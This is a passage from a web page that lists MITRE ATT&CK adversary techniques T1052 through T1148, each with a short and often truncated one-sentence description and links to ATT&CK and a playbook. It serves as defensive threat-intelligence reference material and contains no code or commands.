Exfiltration Over Physical Medium (T1052)

View on ATT&CK

Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive.

More Info

In Playbook
Exfiltration Over Physical Medium

Exfiltration over USB (T1052.001)

View on ATT&CK

Adversaries may attempt to exfiltrate data over a USB connected physical device.

More Info

In Playbook

Scheduled Task/Job (T1053)

View on ATT&CK

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.

More Info

In Playbook
Scheduled Task/Job

At (Linux) (T1053.001)

View on ATT&CK

Adversaries may abuse the [at](https://attack.

More Info

In Playbook
Scheduled Task/Job

At (T1053.002)

View on ATT&CK

Adversaries may abuse the [at](https://attack.

More Info

In Playbook
Scheduled Task/Job

Cron (T1053.003)

View on ATT&CK

Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.

More Info

In Playbook
Scheduled Task/Job

Launchd (T1053.004)

View on ATT&CK

This technique is deprecated due to the inaccurate usage.

More Info

In Playbook
Scheduled Task/Job

Scheduled Task (T1053.005)

View on ATT&CK

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code.

More Info

In Playbook
Scheduled Task/Job

Systemd Timers (T1053.006)

View on ATT&CK

Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code.

More Info

In Playbook
Scheduled Task/Job

Container Orchestration Job (T1053.007)

View on ATT&CK

Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code.

More Info

In Playbook

Indicator Blocking (T1054)

View on ATT&CK

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed.

More Info

In Playbook

Process Injection (T1055)

View on ATT&CK

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook
Process Injection

Dynamic-link Library Injection (T1055.001)

View on ATT&CK

Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook
Process Injection

Portable Executable Injection (T1055.002)

View on ATT&CK

Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook
Process Injection

Thread Execution Hijacking (T1055.003)

View on ATT&CK

Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook
Process Injection

Asynchronous Procedure Call (T1055.004)

View on ATT&CK

Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook
Process Injection

Thread Local Storage (T1055.005)

View on ATT&CK

Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook
Process Injection

Ptrace System Calls (T1055.008)

View on ATT&CK

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook
Process Injection

Proc Memory (T1055.009)

View on ATT&CK

Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook
Process Injection

Extra Window Memory Injection (T1055.011)

View on ATT&CK

Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook
Process Injection

Process Hollowing (T1055.012)

View on ATT&CK

Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.

More Info

In Playbook
Process Injection

Process Doppelgänging (T1055.013)

View on ATT&CK

Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook
Process Injection

VDSO Hijacking (T1055.014)

View on ATT&CK

Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook
Process Injection

ListPlanting (T1055.015)

View on ATT&CK

Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.

More Info

In Playbook

Input Capture (T1056)

View on ATT&CK

Adversaries may use methods of capturing user input to obtain credentials or collect information.

More Info

In Playbook
Input Capture

Keylogging (T1056.001)

View on ATT&CK

Adversaries may log user keystrokes to intercept credentials as the user types them.

More Info

In Playbook
Input Capture

GUI Input Capture (T1056.002)

View on ATT&CK

Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt.

More Info

In Playbook
Input Capture

Web Portal Capture (T1056.003)

View on ATT&CK

Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service.

More Info

In Playbook
Input Capture

Credential API Hooking (T1056.004)

View on ATT&CK

Adversaries may hook into Windows application programming interface (API) functions to collect user credentials.

More Info

In Playbook

Process Discovery (T1057)

View on ATT&CK

Adversaries may attempt to get information about running processes on a system.

More Info

In Playbook

Service Registry Permissions Weakness (T1058)

View on ATT&CK

Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>.

More Info

In Playbook

Command and Scripting Interpreter (T1059)

View on ATT&CK

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.

More Info

In Playbook
Command and Scripting Interpreter

PowerShell (T1059.001)

View on ATT&CK

Adversaries may abuse PowerShell commands and scripts for execution.

More Info

In Playbook
Command and Scripting Interpreter

AppleScript (T1059.002)

View on ATT&CK

Adversaries may abuse AppleScript for execution.

More Info

In Playbook
Command and Scripting Interpreter

Windows Command Shell (T1059.003)

View on ATT&CK

Adversaries may abuse the Windows command shell for execution.

More Info

In Playbook
Command and Scripting Interpreter

Unix Shell (T1059.004)

View on ATT&CK

Adversaries may abuse Unix shell commands and scripts for execution.

More Info

In Playbook
Command and Scripting Interpreter

Visual Basic (T1059.005)

View on ATT&CK

Adversaries may abuse Visual Basic (VB) for execution.

More Info

In Playbook
Command and Scripting Interpreter

Python (T1059.006)

View on ATT&CK

Adversaries may abuse Python commands and scripts for execution.

More Info

In Playbook
Command and Scripting Interpreter

JavaScript (T1059.007)

View on ATT&CK

Adversaries may abuse various implementations of JavaScript for execution.

More Info

In Playbook
Command and Scripting Interpreter

Network Device CLI (T1059.008)

View on ATT&CK

Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads.

More Info

In Playbook
Command and Scripting Interpreter

Cloud API (T1059.009)

View on ATT&CK

Adversaries may abuse cloud APIs to execute malicious commands.

More Info

In Playbook
Command and Scripting Interpreter

AutoHotKey & AutoIT (T1059.010)

View on ATT&CK

Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts.

More Info

In Playbook
Command and Scripting Interpreter

Lua (T1059.011)

View on ATT&CK

Adversaries may abuse Lua commands and scripts for execution.

More Info

In Playbook

Registry Run Keys / Startup Folder (T1060)

View on ATT&CK

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.

More Info

In Playbook

Graphical User Interface (T1061)

View on ATT&CK

**This technique has been deprecated.

More Info

In Playbook

Hypervisor (T1062)

View on ATT&CK

**This technique has been deprecated and should no longer be used.

More Info

In Playbook

Security Software Discovery (T1063)

View on ATT&CK

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system.

More Info

In Playbook

Scripting (T1064)

View on ATT&CK

**This technique has been deprecated.

More Info

In Playbook

Uncommonly Used Port (T1065)

View on ATT&CK

Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.

More Info

In Playbook

Indicator Removal from Tools (T1066)

View on ATT&CK

If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.

More Info

In Playbook

Bootkit (T1067)

View on ATT&CK

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).

More Info

In Playbook

Exploitation for Privilege Escalation (T1068)

View on ATT&CK

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges.

More Info

In Playbook

Permission Groups Discovery (T1069)

View on ATT&CK

Adversaries may attempt to discover group and permission settings.

More Info

In Playbook
Permission Groups Discovery

Local Groups (T1069.001)

View on ATT&CK

Adversaries may attempt to find local system groups and permission settings.

More Info

In Playbook
Permission Groups Discovery

Domain Groups (T1069.002)

View on ATT&CK

Adversaries may attempt to find domain-level groups and permission settings.

More Info

In Playbook
Permission Groups Discovery

Cloud Groups (T1069.003)

View on ATT&CK

Adversaries may attempt to find cloud groups and permission settings.

More Info

In Playbook

Indicator Removal (T1070)

View on ATT&CK

Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses.

More Info

In Playbook
Indicator Removal

Clear Windows Event Logs (T1070.001)

View on ATT&CK

Adversaries may clear Windows Event Logs to hide the activity of an intrusion.

More Info

In Playbook
Indicator Removal

Clear Linux or Mac System Logs (T1070.002)

View on ATT&CK

Adversaries may clear system logs to hide evidence of an intrusion.

More Info

In Playbook
Indicator Removal

Clear Command History (T1070.003)

View on ATT&CK

In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

More Info

In Playbook
Indicator Removal

File Deletion (T1070.004)

View on ATT&CK

Adversaries may delete files left behind by the actions of their intrusion activity.

More Info

In Playbook
Indicator Removal

Network Share Connection Removal (T1070.005)

View on ATT&CK

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

More Info

In Playbook
Indicator Removal

Timestomp (T1070.006)

View on ATT&CK

Adversaries may modify file time attributes to hide new files or changes to existing files.

More Info

In Playbook
Indicator Removal

Clear Network Connection History and Configurations (T1070.007)

View on ATT&CK

Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations.

More Info

In Playbook
Indicator Removal

Clear Mailbox Data (T1070.008)

View on ATT&CK

Adversaries may modify mail and mail application data to remove evidence of their activity.

More Info

In Playbook
Indicator Removal

Clear Persistence (T1070.009)

View on ATT&CK

Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity.

More Info

In Playbook
Indicator Removal

Relocate Malware (T1070.010)

View on ATT&CK

Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses.

More Info

In Playbook

Application Layer Protocol (T1071)

View on ATT&CK

Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic.

More Info

In Playbook
Application Layer Protocol

Web Protocols (T1071.001)

View on ATT&CK

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.

More Info

In Playbook
Application Layer Protocol

File Transfer Protocols (T1071.002)

View on ATT&CK

Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic.

More Info

In Playbook
Application Layer Protocol

Mail Protocols (T1071.003)

View on ATT&CK

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic.

More Info

In Playbook
Application Layer Protocol

DNS (T1071.004)

View on ATT&CK

Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.

More Info

In Playbook
Application Layer Protocol

Publish/Subscribe Protocols (T1071.005)

View on ATT&CK

Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic.

More Info

In Playbook

Software Deployment Tools (T1072)

View on ATT&CK

Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network.

More Info

In Playbook

DLL Side-Loading (T1073)

View on ATT&CK

Programs may specify DLLs that are loaded at runtime.

More Info

In Playbook

Data Staged (T1074)

View on ATT&CK

Adversaries may stage collected data in a central location or directory prior to Exfiltration.

More Info

In Playbook
Data Staged

Local Data Staging (T1074.001)

View on ATT&CK

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration.

More Info

In Playbook
Data Staged

Remote Data Staging (T1074.002)

View on ATT&CK

Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration.

More Info

In Playbook

Pass the Hash (T1075)

View on ATT&CK

Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password.

More Info

In Playbook

Remote Desktop Protocol (T1076)

View on ATT&CK

Remote desktop is a common feature in operating systems.

More Info

In Playbook

Windows Admin Shares (T1077)

View on ATT&CK

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions.

More Info

In Playbook

Valid Accounts (T1078)

View on ATT&CK

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

More Info

In Playbook
Valid Accounts

Default Accounts (T1078.001)

View on ATT&CK

Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

More Info

In Playbook
Valid Accounts

Domain Accounts (T1078.002)

View on ATT&CK

Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

More Info

In Playbook
Valid Accounts

Local Accounts (T1078.003)

View on ATT&CK

Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

More Info

In Playbook
Valid Accounts

Cloud Accounts (T1078.004)

View on ATT&CK

Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

More Info

In Playbook

Multilayer Encryption (T1079)

View on ATT&CK

An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.

More Info

In Playbook

Taint Shared Content (T1080)

View on ATT&CK

Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories.

More Info

In Playbook

Credentials in Files (T1081)

View on ATT&CK

Adversaries may search local file systems and remote file shares for files containing passwords.

More Info

In Playbook

System Information Discovery (T1082)

View on ATT&CK

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.

More Info

In Playbook

File and Directory Discovery (T1083)

View on ATT&CK

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.

More Info

In Playbook

Windows Management Instrumentation Event Subscription (T1084)

View on ATT&CK

Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.

More Info

In Playbook

Rundll32 (T1085)

View on ATT&CK

The rundll32.

More Info

In Playbook

PowerShell (T1086)

View on ATT&CK

PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.

More Info

In Playbook

Account Discovery (T1087)

View on ATT&CK

Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment.

More Info

In Playbook
Account Discovery

Local Account (T1087.001)

View on ATT&CK

Adversaries may attempt to get a listing of local system accounts.

More Info

In Playbook
Account Discovery

Domain Account (T1087.002)

View on ATT&CK

Adversaries may attempt to get a listing of domain accounts.

More Info

In Playbook
Account Discovery

Email Account (T1087.003)

View on ATT&CK

Adversaries may attempt to get a listing of email addresses and accounts.

More Info

In Playbook
Account Discovery

Cloud Account (T1087.004)

View on ATT&CK

Adversaries may attempt to get a listing of cloud accounts.

More Info

In Playbook

Bypass User Account Control (T1088)

View on ATT&CK

Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation.

More Info

In Playbook

Disabling Security Tools (T1089)

View on ATT&CK

Adversaries may disable security tools to avoid possible detection of their tools and activities.

More Info

In Playbook

Proxy (T1090)

View on ATT&CK

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.

More Info

In Playbook
Proxy

Internal Proxy (T1090.001)

View on ATT&CK

Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment.

More Info

In Playbook
Proxy

External Proxy (T1090.002)

View on ATT&CK

Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.

More Info

In Playbook
Proxy

Multi-hop Proxy (T1090.003)

View on ATT&CK

Adversaries may chain together multiple proxies to disguise the source of malicious traffic.

More Info

In Playbook
Proxy

Domain Fronting (T1090.004)

View on ATT&CK

Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.

More Info

In Playbook

Replication Through Removable Media (T1091)

View on ATT&CK

Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes.

More Info

In Playbook

Communication Through Removable Media (T1092)

View on ATT&CK

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.

More Info

In Playbook

Process Hollowing (T1093)

View on ATT&CK

Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code.

More Info

In Playbook

Custom Command and Control Protocol (T1094)

View on ATT&CK

Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Application Layer Protocol](https://attack.

More Info

In Playbook

Non-Application Layer Protocol (T1095)

View on ATT&CK

Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network.

More Info

In Playbook

NTFS File Attributes (T1096)

View on ATT&CK

Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition.

More Info

In Playbook

Pass the Ticket (T1097)

View on ATT&CK

Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password.

More Info

In Playbook

Account Manipulation (T1098)

View on ATT&CK

Adversaries may manipulate accounts to maintain and/or elevate access to victim systems.

More Info

In Playbook
Account Manipulation

Additional Cloud Credentials (T1098.001)

View on ATT&CK

Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

More Info

In Playbook
Account Manipulation

Additional Email Delegate Permissions (T1098.002)

View on ATT&CK

Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.

More Info

In Playbook
Account Manipulation

Additional Cloud Roles (T1098.003)

View on ATT&CK

An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant.

More Info

In Playbook
Account Manipulation

SSH Authorized Keys (T1098.004)

View on ATT&CK

Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host.

More Info

In Playbook
Account Manipulation

Device Registration (T1098.005)

View on ATT&CK

Adversaries may register a device to an adversary-controlled account.

More Info

In Playbook
Account Manipulation

Additional Container Cluster Roles (T1098.006)

View on ATT&CK

An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system.

More Info

In Playbook
Account Manipulation

Additional Local or Domain Groups (T1098.007)

View on ATT&CK

An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain.

More Info

In Playbook

Timestomp (T1099)

View on ATT&CK

Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities.

More Info

In Playbook

Web Shell (T1100)

View on ATT&CK

A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network.

More Info

In Playbook

Security Support Provider (T1101)

View on ATT&CK

Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start.

More Info

In Playbook

Web Service (T1102)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.

More Info

In Playbook
Web Service

Dead Drop Resolver (T1102.001)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure.

More Info

In Playbook
Web Service

Bidirectional Communication (T1102.002)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel.

More Info

In Playbook
Web Service

One-Way Communication (T1102.003)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel.

More Info

In Playbook

AppInit DLLs (T1103)

View on ATT&CK

Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.

More Info

In Playbook

Multi-Stage Channels (T1104)

View on ATT&CK

Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions.

More Info

In Playbook

Ingress Tool Transfer (T1105)

View on ATT&CK

Adversaries may transfer tools or other files from an external system into a compromised environment.

More Info

In Playbook

Native API (T1106)

View on ATT&CK

Adversaries may interact with the native OS application programming interface (API) to execute behaviors.

More Info

In Playbook

File Deletion (T1107)

View on ATT&CK

Adversaries may delete files left behind by the actions of their intrusion activity.

More Info

In Playbook

Redundant Access (T1108)

View on ATT&CK

**This technique has been deprecated.

More Info

In Playbook

Component Firmware (T1109)

View on ATT&CK

Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS.

More Info

In Playbook

Brute Force (T1110)

View on ATT&CK

Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.

More Info

In Playbook
Brute Force

Password Guessing (T1110.001)

View on ATT&CK

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.

More Info

In Playbook
Brute Force

Password Cracking (T1110.002)

View on ATT&CK

Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained.

More Info

In Playbook
Brute Force

Password Spraying (T1110.003)

View on ATT&CK

Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials.

More Info

In Playbook
Brute Force

Credential Stuffing (T1110.004)

View on ATT&CK

Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap.

More Info

In Playbook

Multi-Factor Authentication Interception (T1111)

View on ATT&CK

Adversaries may target multi-factor authentication (MFA) mechanisms, (i.

More Info

In Playbook

Modify Registry (T1112)

View on ATT&CK

Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

More Info

In Playbook

Screen Capture (T1113)

View on ATT&CK

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.

More Info

In Playbook

Email Collection (T1114)

View on ATT&CK

Adversaries may target user email to collect sensitive information.

More Info

In Playbook
Email Collection

Local Email Collection (T1114.001)

View on ATT&CK

Adversaries may target user email on local systems to collect sensitive information.

More Info

In Playbook
Email Collection

Remote Email Collection (T1114.002)

View on ATT&CK

Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information.

More Info

In Playbook
Email Collection

Email Forwarding Rule (T1114.003)

View on ATT&CK

Adversaries may setup email forwarding rules to collect sensitive information.

More Info

In Playbook

Clipboard Data (T1115)

View on ATT&CK

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

More Info

In Playbook

Code Signing (T1116)

View on ATT&CK

Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.

More Info

In Playbook

Regsvr32 (T1117)

View on ATT&CK

Regsvr32.

More Info

In Playbook

InstallUtil (T1118)

View on ATT&CK

InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .

More Info

In Playbook

Automated Collection (T1119)

View on ATT&CK

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

More Info

In Playbook

Peripheral Device Discovery (T1120)

View on ATT&CK

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.

More Info

In Playbook

Regsvcs/Regasm (T1121)

View on ATT&CK

Regsvcs and Regasm are Windows command-line utilities that are used to register .

More Info

In Playbook

Component Object Model Hijacking (T1122)

View on ATT&CK

The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.

More Info

In Playbook

Audio Capture (T1123)

View on ATT&CK

An adversary can leverage a computer's peripheral devices (e.

More Info

In Playbook

System Time Discovery (T1124)

View on ATT&CK

An adversary may gather the system time and/or time zone settings from a local or remote system.

More Info

In Playbook

Video Capture (T1125)

View on ATT&CK

An adversary can leverage a computer's peripheral devices (e.

More Info

In Playbook

Network Share Connection Removal (T1126)

View on ATT&CK

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

More Info

In Playbook

Trusted Developer Utilities Proxy Execution (T1127)

View on ATT&CK

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads.

More Info

In Playbook
Trusted Developer Utilities Proxy Execution

MSBuild (T1127.001)

View on ATT&CK

Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility.

More Info

In Playbook
Trusted Developer Utilities Proxy Execution

ClickOnce (T1127.002)

View on ATT&CK

Adversaries may use ClickOnce applications (.

More Info

In Playbook

Netsh Helper DLL (T1128)

View on ATT&CK

Netsh.

More Info

In Playbook

Shared Modules (T1129)

View on ATT&CK

Adversaries may execute malicious payloads via loading shared modules.

More Info

In Playbook

Install Root Certificate (T1130)

View on ATT&CK

Root certificates are used in public key cryptography to identify a root certificate authority (CA).

More Info

In Playbook

Authentication Package (T1131)

View on ATT&CK

Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start.

More Info

In Playbook

Data Encoding (T1132)

View on ATT&CK

Adversaries may encode data to make the content of command and control traffic more difficult to detect.

More Info

In Playbook
Data Encoding

Standard Encoding (T1132.001)

View on ATT&CK

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect.

More Info

In Playbook
Data Encoding

Non-Standard Encoding (T1132.002)

View on ATT&CK

Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect.

More Info

In Playbook

External Remote Services (T1133)

View on ATT&CK

Adversaries may leverage external-facing remote services to initially access and/or persist within a network.

More Info

In Playbook

Access Token Manipulation (T1134)

View on ATT&CK

Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.

More Info

In Playbook
Access Token Manipulation

Token Impersonation/Theft (T1134.001)

View on ATT&CK

Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls.

More Info

In Playbook
Access Token Manipulation

Create Process with Token (T1134.002)

View on ATT&CK

Adversaries may create a new process with an existing token to escalate privileges and bypass access controls.

More Info

In Playbook
Access Token Manipulation

Make and Impersonate Token (T1134.003)

View on ATT&CK

Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls.

More Info

In Playbook
Access Token Manipulation

Parent PID Spoofing (T1134.004)

View on ATT&CK

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges.

More Info

In Playbook
Access Token Manipulation

SID-History Injection (T1134.005)

View on ATT&CK

Adversaries may use SID-History Injection to escalate privileges and bypass access controls.

More Info

In Playbook

Network Share Discovery (T1135)

View on ATT&CK

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.

More Info

In Playbook

Create Account (T1136)

View on ATT&CK

Adversaries may create an account to maintain access to victim systems.

More Info

In Playbook
Create Account

Local Account (T1136.001)

View on ATT&CK

Adversaries may create a local account to maintain access to victim systems.

More Info

In Playbook
Create Account

Domain Account (T1136.002)

View on ATT&CK

Adversaries may create a domain account to maintain access to victim systems.

More Info

In Playbook
Create Account

Cloud Account (T1136.003)

View on ATT&CK

Adversaries may create a cloud account to maintain access to victim systems.

More Info

In Playbook

Office Application Startup (T1137)

View on ATT&CK

Adversaries may leverage Microsoft Office-based applications for persistence between startups.

More Info

In Playbook
Office Application Startup

Office Template Macros (T1137.001)

View on ATT&CK

Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system.

More Info

In Playbook
Office Application Startup

Office Test (T1137.002)

View on ATT&CK

Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.

More Info

In Playbook
Office Application Startup

Outlook Forms (T1137.003)

View on ATT&CK

Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system.

More Info

In Playbook
Office Application Startup

Outlook Home Page (T1137.004)

View on ATT&CK

Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system.

More Info

In Playbook
Office Application Startup

Outlook Rules (T1137.005)

View on ATT&CK

Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system.

More Info

In Playbook
Office Application Startup

Add-ins (T1137.006)

View on ATT&CK

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.

More Info

In Playbook

Application Shimming (T1138)

View on ATT&CK

The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.

More Info

In Playbook

Bash History (T1139)

View on ATT&CK

Bash keeps track of the commands users type on the command-line with the "history" utility.

More Info

In Playbook

Deobfuscate/Decode Files or Information (T1140)

View on ATT&CK

Adversaries may use [Obfuscated Files or Information](https://attack.

More Info

In Playbook

Input Prompt (T1141)

View on ATT&CK

When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.

More Info

In Playbook

Keychain (T1142)

View on ATT&CK

Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos.

More Info

In Playbook

Hidden Window (T1143)

View on ATT&CK

Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users.

More Info

In Playbook

Gatekeeper Bypass (T1144)

View on ATT&CK

In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.

More Info

In Playbook

Private Keys (T1145)

View on ATT&CK

Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.

More Info

In Playbook

Clear Command History (T1146)

View on ATT&CK

In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

More Info

In Playbook

Hidden Users (T1147)

View on ATT&CK

Every user account in macOS has a userID associated with it.

More Info

In Playbook

HISTCONTROL (T1148)

